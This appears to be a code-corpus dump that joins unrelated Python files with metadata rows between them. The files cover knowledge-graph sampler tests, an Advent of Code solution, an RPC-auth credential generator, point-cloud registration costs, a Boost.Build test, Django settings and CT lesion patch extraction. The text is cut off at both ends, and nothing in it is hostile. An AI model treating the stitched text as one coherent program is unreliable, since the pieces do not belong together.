from tests.test_sampling import cases
class BasicNegativeSamplerTest(cases.NegativeSamplerGenericTestCase):
"""Test the basic negative sampler."""
cls = BasicNegativeSampler
def test_sample_basic(self):
"""Test if relations and half of heads and tails are not corrupted."""
negative_batch, batch_filter = self.instance.sample(positive_batch=self.positive_batch)
# Test that half of the subjects and half of the objects are corrupted
positive_batch = self.positive_batch.unsqueeze(dim=1)
num_triples = negative_batch[..., 0].numel()
half_size = num_triples // 2
num_subj_corrupted = (positive_batch[..., 0] != negative_batch[..., 0]).sum()
num_obj_corrupted = (positive_batch[..., 2] != negative_batch[..., 2]).sum()
assert num_obj_corrupted - 1 <= num_subj_corrupted
assert num_subj_corrupted - 1 <= num_obj_corrupted
assert num_subj_corrupted - 1 <= num_triples
assert half_size - 1 <= num_subj_corrupted
class BernoulliNegativeSamplerTest(cases.NegativeSamplerGenericTestCase):
"""Test the Bernoulli negative sampler."""
cls = BernoulliNegativeSampler
class PseudoTypedNegativeSamplerTest(cases.NegativeSamplerGenericTestCase):
"""Test the pseudo-type negative sampler."""
cls = PseudoTypedNegativeSampler
def test_corrupt_batch(self):
"""Additional test for corrupt_batch."""
positive_batch = self.positive_batch.unsqueeze(dim=1)
negative_batch = self.instance.corrupt_batch(positive_batch=self.positive_batch)
# same relation
assert (negative_batch[..., 1] == positive_batch[..., 1]).all()
# only corruption of a single entity (note: we do not check for exactly 2, since we do not filter).
assert ((negative_batch == positive_batch).sum(dim=-1) >= 2).all()
# check that corrupted entities co-occur with the relation in training data
for entity_pos in (0, 2):
er_training = {(r, e) for r, e in self.triples_factory.mapped_triples[:, [1, entity_pos]].tolist()}
er_negative = {(r, e) for r, e in negative_batch.view(-1, 3)[:, [1, entity_pos]].tolist()}
assert er_negative.issubset(er_training)
def test_index_structure(self):
"""Test the index structure."""
data, offsets = create_index(triples_factory=self.triples_factory)
triples = self.triples_factory.mapped_triples
for r in range(self.triples_factory.num_relations):
triples_with_r = triples[triples[:, 1] == r]
for i, entity_pos in enumerate((0, 2)):
index_entities = set(data[offsets[2 * r + i]: offsets[2 * r + i + 1]].tolist())
triple_entities = set(triples_with_r[:, entity_pos].tolist())
assert index_entities == triple_entities
| 46.560606
| 111
| 0.684348
|
c3229f0ff0e21d4c2bb8cd6b5fe3e43c9acb0555
| 2,013
|
py
|
Python
|
2015/day15/day15.py
|
e-jameson/aoc
|
f26196d5564a9ac8027532c276af00aaf3718c6e
|
[
"MIT"
] | null | null | null |
2015/day15/day15.py
|
e-jameson/aoc
|
f26196d5564a9ac8027532c276af00aaf3718c6e
|
[
"MIT"
] | null | null | null |
2015/day15/day15.py
|
e-jameson/aoc
|
f26196d5564a9ac8027532c276af00aaf3718c6e
|
[
"MIT"
] | null | null | null |
from helpers import as_list
ingredients = dict()
# lines = as_list('2015/day15/example-input.txt')
lines = as_list('2015/day15/input.txt')
for line in lines:
name, stats = line.split(': ')
ingredients.setdefault(name, dict())
for stat in stats.split(', '):
t, v = stat.split()
ingredients[name][t] = int(v)
def max_ingredients(ingredients, count_cals=False):
high = -1
for a in range(1,100):
for b in range(1, 100):
for c in range(1, 100):
for d in range(1, 100):
if a + b + c + d> 100:
continue
# a: Frosting
# b: Candy
# c: Butterscotch
# d: Sugar
frosting = ingredients['Frosting']
candy = ingredients['Candy']
butterscotch = ingredients['Butterscotch']
sugar = ingredients['Sugar']
if count_cals:
cals = a*frosting['calories'] + b*candy['calories'] + c*butterscotch['calories'] + d*sugar['calories']
if cals != 500:
continue
capacity = max(0, a*frosting['capacity'] + b*candy['capacity'] + c*butterscotch['capacity'] + d*sugar['capacity'])
durability = max(0, a*frosting['durability'] + b*candy['durability'] + c*butterscotch['durability'] + d*sugar['durability'])
flavor = max(0, a*frosting['flavor'] + b*candy['flavor'] + c*butterscotch['flavor'] + d*sugar['flavor'])
texture = max(0, a*frosting['texture'] + b*candy['texture'] + c*butterscotch['texture'] + d*sugar['texture'])
val = capacity * durability * flavor * texture
high = max(high, val)
return high
print('2015 Day 15 Part 1')
print(max_ingredients(ingredients, False))
print('2015 Day 15 Part 2')
print(max_ingredients(ingredients, True))
| 37.981132
| 144
| 0.522603
|
596d3b94c66bde9152c7911e958e22a0d64d5015
| 1,115
|
py
|
Python
|
share/rpcauth/rpcauth.py
|
unelmacoin/unelmacoin
|
35e3ec841296133e33778f1a27c90d3aa6761c3f
|
[
"MIT"
] | 4
|
2021-05-03T13:29:56.000Z
|
2021-05-30T14:37:29.000Z
|
share/rpcauth/rpcauth.py
|
unelmacoin/unelmacoin
|
35e3ec841296133e33778f1a27c90d3aa6761c3f
|
[
"MIT"
] | 1
|
2021-05-07T13:41:09.000Z
|
2021-05-08T06:55:48.000Z
|
share/rpcauth/rpcauth.py
|
unelmacoin/unelmacoin
|
35e3ec841296133e33778f1a27c90d3aa6761c3f
|
[
"MIT"
] | 1
|
2021-05-07T13:30:16.000Z
|
2021-05-07T13:30:16.000Z
|
#!/usr/bin/env python
# Copyright (c) 2015-2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
import hashlib
import sys
import os
from random import SystemRandom
import base64
import hmac
if len(sys.argv) < 2:
sys.stderr.write('Please include username as an argument.\n')
sys.exit(0)
username = sys.argv[1]
#This uses os.urandom() underneath
cryptogen = SystemRandom()
#Create 16 byte hex salt
salt_sequence = [cryptogen.randrange(256) for i in range(16)]
hexseq = list(map(hex, salt_sequence))
salt = "".join([x[2:] for x in hexseq])
#Create 32 byte b64 password
password = base64.urlsafe_b64encode(os.urandom(32))
digestmod = hashlib.sha256
if sys.version_info.major >= 3:
password = password.decode('utf-8')
digestmod = 'SHA256'
m = hmac.new(bytearray(salt, 'utf-8'), bytearray(password, 'utf-8'), digestmod)
result = m.hexdigest()
print("String to be appended to unelmacoin.conf:")
print("rpcauth="+username+":"+salt+"$"+result)
print("Your password:\n"+password)
| 26.547619
| 79
| 0.729148
|
34c05c60fa58f9e2a91ef5967d59e433c8a8bca8
| 3,443
|
py
|
Python
|
probreg/cost_functions.py
|
OscarPellicer/probreg
|
8f1dd23dd86371b8040abad580332ff36967c078
|
[
"MIT"
] | 479
|
2019-03-06T16:24:01.000Z
|
2022-03-31T08:38:54.000Z
|
probreg/cost_functions.py
|
OscarPellicer/probreg
|
8f1dd23dd86371b8040abad580332ff36967c078
|
[
"MIT"
] | 86
|
2019-05-15T19:10:53.000Z
|
2022-03-26T06:14:54.000Z
|
probreg/cost_functions.py
|
OscarPellicer/probreg
|
8f1dd23dd86371b8040abad580332ff36967c078
|
[
"MIT"
] | 101
|
2019-03-21T08:52:58.000Z
|
2022-03-01T19:13:39.000Z
|
from __future__ import division, print_function
import abc
import numpy as np
import six
import transforms3d as t3d
from . import gauss_transform as gt
from . import se3_op as so
from . import transformation as tf
@six.add_metaclass(abc.ABCMeta)
class CostFunction:
def __init__(self, tf_type):
self._tf_type = tf_type
@abc.abstractmethod
def to_transformation(self, theta):
return None
@abc.abstractmethod
def initial(self):
return None
@abc.abstractmethod
def __call__(self, theta, *args):
return None, None
def compute_l2_dist(mu_source, phi_source, mu_target, phi_target, sigma):
z = np.power(2.0 * np.pi * sigma ** 2, mu_source.shape[1] * 0.5)
gtrans = gt.GaussTransform(mu_target, np.sqrt(2.0) * sigma)
phi_j_e = gtrans.compute(mu_source, phi_target / z)
phi_mu_j_e = gtrans.compute(mu_source, phi_target * mu_target.T / z).T
g = (phi_source * phi_j_e * mu_source.T - phi_source * phi_mu_j_e.T).T / (2.0 * sigma ** 2)
return -np.dot(phi_source, phi_j_e), g
class RigidCostFunction(CostFunction):
def __init__(self):
self._tf_type = tf.RigidTransformation
def to_transformation(self, theta):
rot = t3d.quaternions.quat2mat(theta[:4])
return self._tf_type(rot, theta[4:7])
def initial(self):
x0 = np.zeros(7)
x0[0] = 1.0
return x0
def __call__(self, theta, *args):
mu_source, phi_source, mu_target, phi_target, sigma = args
tf_obj = self.to_transformation(theta)
t_mu_source = tf_obj.transform(mu_source)
f, g = compute_l2_dist(t_mu_source, phi_source, mu_target, phi_target, sigma)
d_rot = so.diff_rot_from_quaternion(theta[:4])
gtm0 = np.dot(g.T, mu_source)
grad = np.concatenate([(gtm0 * d_rot).sum(axis=(1, 2)), g.sum(axis=0)])
return f, grad
class TPSCostFunction(CostFunction):
def __init__(self, control_pts, alpha=1.0, beta=0.1):
self._tf_type = tf.TPSTransformation
self._alpha = alpha
self._beta = beta
self._control_pts = control_pts
def to_transformation(self, theta):
dim = self._control_pts.shape[1]
n_data = theta.shape[0] // dim
n_a = dim * (dim + 1)
a = theta[:n_a].reshape(dim + 1, dim)
v = theta[n_a:].reshape(n_data - dim - 1, dim)
return self._tf_type(a, v, self._control_pts)
def initial(self):
dim = self._control_pts.shape[1]
a = np.r_[np.zeros((1, dim)), np.identity(dim)]
v = np.zeros((self._control_pts.shape[0] - dim - 1, dim))
return np.r_[a, v].flatten()
def __call__(self, theta, *args):
dim = self._control_pts.shape[1]
mu_source, phi_source, mu_target, phi_target, sigma = args
tf_obj = self.to_transformation(theta)
basis, kernel = tf_obj.prepare(mu_source)
t_mu_source = tf_obj.transform_basis(basis)
bending = np.trace(np.dot(tf_obj.v.T, np.dot(kernel, tf_obj.v)))
f1, g1 = compute_l2_dist(t_mu_source, phi_source, t_mu_source, phi_source, sigma)
f2, g2 = compute_l2_dist(t_mu_source, phi_source, mu_target, phi_target, sigma)
f = -f1 + 2.0 * f2
g = -2.0 * g1 + 2.0 * g2
grad = self._alpha * np.dot(basis.T, g)
grad[dim + 1 :, :] += 2.0 * self._beta * np.dot(kernel, tf_obj.v)
return self._alpha * f + self._beta * bending, grad.flatten()
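# ---------------------------------------------------------------------------
# Editor's note: a hypothetical sketch (not part of the original module) of
# how one of the cost functions above can be minimized with a gradient-based
# optimizer. Because __call__ returns (value, gradient), the object can be
# passed to scipy.optimize.minimize with jac=True. The GMM means and weights
# (mu_*, phi_*) are assumed to have been estimated beforehand; sigma is an
# illustrative bandwidth.
def _fit_rigid_sketch(mu_source, phi_source, mu_target, phi_target, sigma=1.0):
    from scipy.optimize import minimize
    cost = RigidCostFunction()
    args = (mu_source, phi_source, mu_target, phi_target, sigma)
    res = minimize(cost, cost.initial(), args=args, method='L-BFGS-B', jac=True)
    return cost.to_transformation(res.x)
# ---------------------------------------------------------------------------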
| 34.43
| 95
| 0.639559
|
2e4fd1215cc44b1f4c3cb4456512ee25d4e94ca6
| 1,181
|
py
|
Python
|
boost/tools/build/v2/test/builtin_exit.py
|
randolphwong/mcsema
|
eb5b376736e7f57ff0a61f7e4e5a436bbb874720
|
[
"BSD-3-Clause"
] | 11
|
2016-04-12T16:29:29.000Z
|
2021-06-28T11:01:57.000Z
|
boost/tools/build/v2/test/builtin_exit.py
|
randolphwong/mcsema
|
eb5b376736e7f57ff0a61f7e4e5a436bbb874720
|
[
"BSD-3-Clause"
] | 3
|
2018-10-31T19:35:14.000Z
|
2019-06-04T17:11:27.000Z
|
boost/tools/build/v2/test/builtin_exit.py
|
randolphwong/mcsema
|
eb5b376736e7f57ff0a61f7e4e5a436bbb874720
|
[
"BSD-3-Clause"
] | 9
|
2015-09-09T02:38:32.000Z
|
2021-01-30T00:24:24.000Z
|
#!/usr/bin/python
# Copyright 2012 Steven Watanabe
# Distributed under the Boost Software License, Version 1.0.
# (See accompanying file LICENSE_1_0.txt or http://www.boost.org/LICENSE_1_0.txt)
# This tests the EXIT rule.
import BoostBuild
def test_exit(name):
t = BoostBuild.Tester(pass_toolset=0)
t.write("file.jam", """
%s ;
""" % name)
t.run_build_system("-ffile.jam", status=1, stdout="\n")
t.rm(".")
t.write("file.jam", """
%s : 0 ;
""" % name)
t.run_build_system("-ffile.jam", stdout="\n")
t.rm(".")
t.write("file.jam", """
%s : 1 ;
""" % name)
t.run_build_system("-ffile.jam", status=1, stdout="\n")
t.rm(".")
t.write("file.jam", """
%s : 2 ;
""" % name)
t.run_build_system("-ffile.jam", status=2, stdout="\n")
t.rm(".")
t.write("file.jam", """
%s a message ;
""" % name)
t.run_build_system("-ffile.jam", status=1, stdout="a message\n")
t.rm(".")
t.write("file.jam", """
%s a message : 0 ;
""" % name)
t.run_build_system("-ffile.jam", stdout="a message\n")
t.rm(".")
t.cleanup()
test_exit("EXIT")
test_exit("Exit")
test_exit("exit")
| 21.472727
| 81
| 0.560542
|
b25993f4de9d53deef4e49914e08c5154da9ff1f
| 9,839
|
py
|
Python
|
{{cookiecutter.project_slug}}/config/settings/common.py
|
gofullthrottle/cookiecutter-django-mysql-2016
|
f6e0d84a9183462a2e82f256dff07ef85ed13ca5
|
[
"Apache-2.0"
] | 4
|
2016-10-28T00:34:13.000Z
|
2017-10-20T02:08:09.000Z
|
{{cookiecutter.project_slug}}/config/settings/common.py
|
gofullthrottle/cookiecutter-django-mysql-2016
|
f6e0d84a9183462a2e82f256dff07ef85ed13ca5
|
[
"Apache-2.0"
] | null | null | null |
{{cookiecutter.project_slug}}/config/settings/common.py
|
gofullthrottle/cookiecutter-django-mysql-2016
|
f6e0d84a9183462a2e82f256dff07ef85ed13ca5
|
[
"Apache-2.0"
] | 1
|
2020-07-07T18:33:47.000Z
|
2020-07-07T18:33:47.000Z
|
# -*- coding: utf-8 -*-
"""
Django settings for {{cookiecutter.project_name}} project.
For more information on this file, see
https://docs.djangoproject.com/en/dev/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/dev/ref/settings/
"""
from __future__ import absolute_import, unicode_literals
import environ
ROOT_DIR = environ.Path(__file__) - 3 # ({{ cookiecutter.project_slug }}/config/settings/common.py - 3 = {{ cookiecutter.project_slug }}/)
APPS_DIR = ROOT_DIR.path('{{ cookiecutter.project_slug }}')
env = environ.Env()
# APP CONFIGURATION
# ------------------------------------------------------------------------------
DJANGO_APPS = (
# Default Django apps:
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# Useful template tags:
# 'django.contrib.humanize',
# Admin
'django.contrib.admin',
)
THIRD_PARTY_APPS = (
'crispy_forms', # Form layouts
'allauth', # registration
'allauth.account', # registration
'allauth.socialaccount', # registration
)
# Apps specific for this project go here.
LOCAL_APPS = (
# custom users app
'{{ cookiecutter.project_slug }}.users.apps.UsersConfig',
# Your stuff: custom apps go here
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#installed-apps
INSTALLED_APPS = DJANGO_APPS + THIRD_PARTY_APPS + LOCAL_APPS
# MIDDLEWARE CONFIGURATION
# ------------------------------------------------------------------------------
MIDDLEWARE_CLASSES = (
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
# MIGRATIONS CONFIGURATION
# ------------------------------------------------------------------------------
MIGRATION_MODULES = {
'sites': '{{ cookiecutter.project_slug }}.contrib.sites.migrations'
}
# DEBUG
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#debug
DEBUG = env.bool('DJANGO_DEBUG', False)
# FIXTURE CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-FIXTURE_DIRS
FIXTURE_DIRS = (
str(APPS_DIR.path('fixtures')),
)
# EMAIL CONFIGURATION
# ------------------------------------------------------------------------------
EMAIL_BACKEND = env('DJANGO_EMAIL_BACKEND', default='django.core.mail.backends.smtp.EmailBackend')
# MANAGER CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#admins
ADMINS = (
("""{{cookiecutter.author_name}}""", '{{cookiecutter.email}}'),
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#managers
MANAGERS = ADMINS
# DATABASE CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#databases
DATABASES = {
# Raises ImproperlyConfigured exception if DATABASE_URL not in os.environ
'default': env.db('DATABASE_URL', default='postgres://{% if cookiecutter.windows == 'y' %}localhost{% endif %}/{{cookiecutter.project_slug}}'),
}
DATABASES['default']['ATOMIC_REQUESTS'] = True
# GENERAL CONFIGURATION
# ------------------------------------------------------------------------------
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
TIME_ZONE = '{{ cookiecutter.timezone }}'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#language-code
LANGUAGE_CODE = 'en-us'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#site-id
SITE_ID = 1
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n
USE_I18N = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n
USE_L10N = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-tz
USE_TZ = True
# TEMPLATE CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#templates
TEMPLATES = [
{
# See: https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-TEMPLATES-BACKEND
'BACKEND': 'django.template.backends.django.DjangoTemplates',
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs
'DIRS': [
str(APPS_DIR.path('templates')),
],
'OPTIONS': {
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-debug
'debug': DEBUG,
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-loaders
# https://docs.djangoproject.com/en/dev/ref/templates/api/#loader-types
'loaders': [
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
],
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.template.context_processors.i18n',
'django.template.context_processors.media',
'django.template.context_processors.static',
'django.template.context_processors.tz',
'django.contrib.messages.context_processors.messages',
# Your stuff: custom template context processors go here
],
},
},
]
# See: http://django-crispy-forms.readthedocs.io/en/latest/install.html#template-packs
CRISPY_TEMPLATE_PACK = 'bootstrap3'
# STATIC FILE CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-root
STATIC_ROOT = str(ROOT_DIR('staticfiles'))
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-url
STATIC_URL = '/static/'
# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS
STATICFILES_DIRS = (
str(APPS_DIR.path('static')),
)
# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
# MEDIA CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-root
MEDIA_ROOT = str(APPS_DIR('media'))
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-url
MEDIA_URL = '/media/'
# URL Configuration
# ------------------------------------------------------------------------------
ROOT_URLCONF = 'config.urls'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application
WSGI_APPLICATION = 'config.wsgi.application'
# AUTHENTICATION CONFIGURATION
# ------------------------------------------------------------------------------
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend',
'allauth.account.auth_backends.AuthenticationBackend',
)
# Some really nice defaults
ACCOUNT_AUTHENTICATION_METHOD = 'username'
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_EMAIL_VERIFICATION = 'mandatory'
ACCOUNT_ALLOW_REGISTRATION = env.bool('DJANGO_ACCOUNT_ALLOW_REGISTRATION', True)
ACCOUNT_ADAPTER = '{{cookiecutter.project_slug}}.users.adapters.AccountAdapter'
SOCIALACCOUNT_ADAPTER = '{{cookiecutter.project_slug}}.users.adapters.SocialAccountAdapter'
# Custom user app defaults
# Select the correct user model
AUTH_USER_MODEL = 'users.User'
LOGIN_REDIRECT_URL = 'users:redirect'
LOGIN_URL = 'account_login'
# SLUGLIFIER
AUTOSLUG_SLUGIFY_FUNCTION = 'slugify.slugify'
{% if cookiecutter.use_celery == 'y' %}
########## CELERY
INSTALLED_APPS += ('{{cookiecutter.project_slug}}.taskapp.celery.CeleryConfig',)
# if you are not using the django database broker (e.g. rabbitmq, redis, memcached), you can remove the next line.
INSTALLED_APPS += ('kombu.transport.django',)
BROKER_URL = env('CELERY_BROKER_URL', default='django://')
if BROKER_URL == 'django://':
CELERY_RESULT_BACKEND = 'redis://'
else:
CELERY_RESULT_BACKEND = BROKER_URL
########## END CELERY
{% endif %}
# django-compressor
# ------------------------------------------------------------------------------
{% if cookiecutter.use_compressor == 'y'-%}
INSTALLED_APPS += ("compressor", )
STATICFILES_FINDERS += ("compressor.finders.CompressorFinder", )
{%- endif %}
# Location of root django.contrib.admin URL, use {% raw %}{% url 'admin:index' %}{% endraw %}
ADMIN_URL = r'^admin/'
{% if cookiecutter.js_task_runner == 'Webpack' %}
# WEBPACK
# ------------------------------------------------------------------------------
INSTALLED_APPS += ('webpack_loader',)
# Webpack Local Stats file
STATS_FILE = ROOT_DIR('webpack-stats.json')
# Webpack config
WEBPACK_LOADER = {
'DEFAULT': {
'STATS_FILE': STATS_FILE
}
}
{% endif %}
# Your common stuff: Below this line define 3rd party library settings
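# ---------------------------------------------------------------------------
# Editor's note: a hypothetical environment sketch (all values are
# placeholders) for the django-environ lookups used above; each variable is
# read with env(), env.db() or env.bool() in this settings module.
#
# DJANGO_DEBUG=True
# DATABASE_URL=postgres://user:password@localhost:5432/{{cookiecutter.project_slug}}
# DJANGO_EMAIL_BACKEND=django.core.mail.backends.console.EmailBackend
# DJANGO_ACCOUNT_ALLOW_REGISTRATION=True
# CELERY_BROKER_URL=redis://localhost:6379/0
# ---------------------------------------------------------------------------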
| 37.128302
| 147
| 0.621913
|
64ad504a4f5339c8b2ea0c31fbf1a0fb2255c762
| 11,732
|
py
|
Python
|
utils/patch_ops.py
|
muschellij2/tbi_ct_lesion_segmentation
|
e3bc5af5eb8ed8bb2766afc00401f03978821d6f
|
[
"MIT"
] | null | null | null |
utils/patch_ops.py
|
muschellij2/tbi_ct_lesion_segmentation
|
e3bc5af5eb8ed8bb2766afc00401f03978821d6f
|
[
"MIT"
] | null | null | null |
utils/patch_ops.py
|
muschellij2/tbi_ct_lesion_segmentation
|
e3bc5af5eb8ed8bb2766afc00401f03978821d6f
|
[
"MIT"
] | null | null | null |
import os
import numpy as np
import nibabel as nib
from sklearn.utils import shuffle
from tqdm import tqdm
from .pad import pad_image
import random
import copy
from time import strftime, time
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
import sys
def PadImage(vol, padsize):
dim = vol.shape
padsize = np.asarray(padsize, dtype=int)
dim2 = dim+2*padsize
temp = np.zeros(dim2, dtype=float)
temp[padsize:dim[0]+padsize,
padsize:dim[1]+padsize,
padsize:dim[2]+padsize] = vol
return temp
def get_intersection(a, b):
'''
Gets intersection of coordinate arrays a and b returned from np.nonzero()-style functions.
Used to find valid centers for healthy patches.
TODO: CURRENTLY ONLY WORKS ON 3D ARRAYS
Params:
- a: tuple of N np.arrays, where N is the dimension of the original image
- b: tuple of N np.arrays, where N is the dimension of the original image
Returns:
- intersection: set of tuples of rank N, where N is the dimension of the original image
'''
# TODO: this is the slowest operation
start_time = time()
print(np.array(a).shape)
print(np.array(b).shape)
if len(a) == 3:
# first change format to be a list of coordinates rather than one list per dimension
a_reformat = [(x, y, z) for x, y, z in zip(a[0], a[1], a[2])]
b_reformat = [(x, y, z) for x, y, z in zip(b[0], b[1], b[2])]
elif len(a) == 2:
a_reformat = [(x, y) for x, y in zip(a[0], a[1])]
b_reformat = [(x, y) for x, y in zip(b[0], b[1])]
    else:
        # Only 2D and 3D coordinate arrays are supported; raise instead of
        # falling through to an undefined-variable NameError below.
        raise ValueError("get_intersection only supports 2D or 3D coordinate arrays")
intersection = set(a_reformat) & set(b_reformat)
print("Time taken to calculate intersection:",
time() - start_time, "seconds")
return intersection
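# Editor's illustrative sketch (not part of the original module): a minimal,
# never-called example of how get_intersection consumes np.nonzero()-style
# coordinate tuples. The toy arrays below are invented for the example.
def _example_get_intersection():
    a = np.nonzero(np.array([[1, 0], [1, 1]]))  # coords {(0, 0), (1, 0), (1, 1)}
    b = np.nonzero(np.array([[1, 1], [0, 1]]))  # coords {(0, 0), (0, 1), (1, 1)}
    common = get_intersection(a, b)             # -> {(0, 0), (1, 1)}
    return common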
def get_center_coords(ct, mask, ratio):
'''
Gets coordinates for center pixel of all patches.
Params:
- ct: 3D ndarray, image data from which to find healthy coordinates
- mask: 3D ndarray, image data from which to find coordinates
- ratio: float in [0,1].
If 0 or 1, skip intersection calculation for speed
Returns:
- healthy_coords: set of tuples of rank 3, coordinates of healthy voxels
- lesion_coords: set of tuples of rank 3, coordinates of lesion voxels
'''
# These first two must be shuffled.
if ratio == 1:
# ct-valid patches
ct_possible_centers = np.nonzero(ct)
healthy_coords = [(x, y, z) for x, y, z in zip(ct_possible_centers[0],
ct_possible_centers[1],
ct_possible_centers[2])]
healthy_coords = set(shuffle(healthy_coords, random_state=0))
        # dummy placeholder; a set literal collapses the duplicates to a single coordinate
        lesion_coords = {(0, 0, 0)}
elif ratio == 0:
        # dummy placeholder; a set literal collapses the duplicates to a single coordinate
        healthy_coords = {(0, 0, 0)}
# mask lesion patches
lesion_coords = np.nonzero(mask)
        # currently only works for 3D input images
lesion_coords = [(x, y, z) for x, y, z in zip(lesion_coords[0],
lesion_coords[1],
lesion_coords[2])]
lesion_coords = set(shuffle(lesion_coords, random_state=0))
else:
# ct-valid patches
ct_possible_centers = np.nonzero(ct)
zeros_coords = np.where(mask == 0)
healthy_coords = get_intersection(ct_possible_centers, zeros_coords)
# mask lesion patches
lesion_coords = np.nonzero(mask)
# currently only works for 3D input images
# This does not need to be shuffled since it will be shuffled later
lesion_coords = set([(x, y, z) for x, y, z in zip(lesion_coords[0],
lesion_coords[1],
lesion_coords[2])])
return healthy_coords, lesion_coords
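# Editor's illustrative sketch (not part of the original module): when the
# requested lesion/healthy ratio is strictly between 0 and 1, get_center_coords
# intersects the nonzero CT voxels with the zero-mask voxels to find valid
# healthy patch centers. The toy volumes below are invented for the example.
def _example_get_center_coords():
    ct = np.ones((4, 4, 4), dtype=np.float32)
    mask = np.zeros((4, 4, 4), dtype=np.float32)
    mask[1, 1, 1] = 1.0                              # single lesion voxel
    healthy, lesion = get_center_coords(ct, mask, ratio=0.5)
    # lesion == {(1, 1, 1)}; healthy contains the remaining 63 voxel coordinates
    return healthy, lesion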
def get_patches(invols, mask, patchsize, maxpatch, num_channels):
    '''
    Extracts 2D patches centered on lesion voxels plus an equal number of
    patches centered on healthy brain voxels.
    Params:
        - invols: list of 3D ndarrays, one per input channel
        - mask: 3D ndarray, binary lesion mask
        - patchsize: 2-element array-like, in-plane patch dimensions
        - maxpatch: int, maximum number of lesion patches to extract
        - num_channels: int, number of input channels
    Returns:
        - CTPatches: 4D ndarray, shape (2*num_patches, patchsize[0], patchsize[1], num_channels)
        - MaskPatches: 4D ndarray, shape (2*num_patches, patchsize[0], patchsize[1], 1)
    '''
rng = random.SystemRandom()
mask = np.asarray(mask, dtype=np.float32)
patch_size = np.asarray(patchsize, dtype=int)
dsize = np.floor(patchsize/2).astype(dtype=int)
# find indices of all lesions in mask volume
mask_lesion_indices = np.nonzero(mask)
mask_lesion_indices = np.asarray(mask_lesion_indices, dtype=int)
total_lesion_patches = len(mask_lesion_indices[0])
num_patches = np.minimum(maxpatch, total_lesion_patches)
'''
print("Number of patches used: {} out of {} (max: {})"
.format(num_patches,
total_lesion_patches,
maxpatch))
'''
randidx = rng.sample(range(0, total_lesion_patches), num_patches)
# here, 3 corresponds to each axis of the 3D volume
shuffled_mask_lesion_indices = np.ndarray((3, num_patches))
for i in range(0, num_patches):
for j in range(0, 3):
shuffled_mask_lesion_indices[j,
i] = mask_lesion_indices[j, randidx[i]]
shuffled_mask_lesion_indices = np.asarray(
shuffled_mask_lesion_indices, dtype=int)
# mask out all lesion indices to get all healthy indices
tmp = copy.deepcopy(invols[0])
tmp[tmp > 0] = 1
tmp[tmp <= 0] = 0
tmp = np.multiply(tmp, 1-mask)
healthy_brain_indices = np.nonzero(tmp)
healthy_brain_indices = np.asarray(healthy_brain_indices, dtype=int)
num_healthy_indices = len(healthy_brain_indices[0])
randidx0 = rng.sample(range(0, num_healthy_indices), num_patches)
# here, 3 corresponds to each axis of the 3D volume
shuffled_healthy_brain_indices = np.ndarray((3, num_patches))
for i in range(0, num_patches):
for j in range(0, 3):
shuffled_healthy_brain_indices[j,
i] = healthy_brain_indices[j, randidx0[i]]
shuffled_healthy_brain_indices = np.asarray(
shuffled_healthy_brain_indices, dtype=int)
newidx = np.concatenate([shuffled_mask_lesion_indices,
shuffled_healthy_brain_indices], axis=1)
CT_matsize = (2*num_patches, patchsize[0], patchsize[1], num_channels)
Mask_matsize = (2*num_patches, patchsize[0], patchsize[1], 1)
CTPatches = np.ndarray(CT_matsize, dtype=np.float16)
MaskPatches = np.ndarray(Mask_matsize, dtype=np.float16)
for i in range(0, 2*num_patches):
I = newidx[0, i]
J = newidx[1, i]
K = newidx[2, i]
for c in range(num_channels):
'''
CTPatches[i, :, :, c] = invols[c][I - dsize[0]: I + dsize[0] + 1,
J - dsize[1]: J + dsize[1] + 1,
K]
'''
# trying even-sided patches
